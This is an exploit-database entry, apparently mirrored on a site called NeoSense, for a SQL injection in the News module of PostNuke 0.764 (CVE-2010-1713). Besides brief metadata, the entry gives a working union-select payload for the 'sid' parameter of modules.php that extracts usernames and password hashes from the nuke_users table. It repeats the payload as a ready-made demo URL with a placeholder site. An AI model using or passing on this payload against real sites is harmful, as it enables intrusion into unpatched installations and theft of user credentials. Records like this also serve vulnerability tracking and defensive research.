[] NeoSense
E X P L O I T S
title author type platform port cve id

PostNuke 0.764 Module modload - SQL Injection

Author: BILGE_KAGAN
type: webapps
platform: php
port: 
date_added: 2010-04-25 
date_updated:  
verified: 1 
codes: OSVDB-64352;CVE-2010-1713 
tags: 
aliases:  
screenshot_url:  
application_url: 
PostNuke 0.764 Module modload SQL Injection Vulnerability

###########################

Author    : BILGE_KAGAN

Homepage  : http://www.1923turk.com

Script    : postnuke http://www.postnuke.com

Download  : http://www.postnuke.com/module-Content-view-pid-2.html

###########################

[ Vulnerable File ]


modules.php?op=modload&name=News&file=article&sid=[ SQL ]


[ XpL ]


1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--

[ Demo]


http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.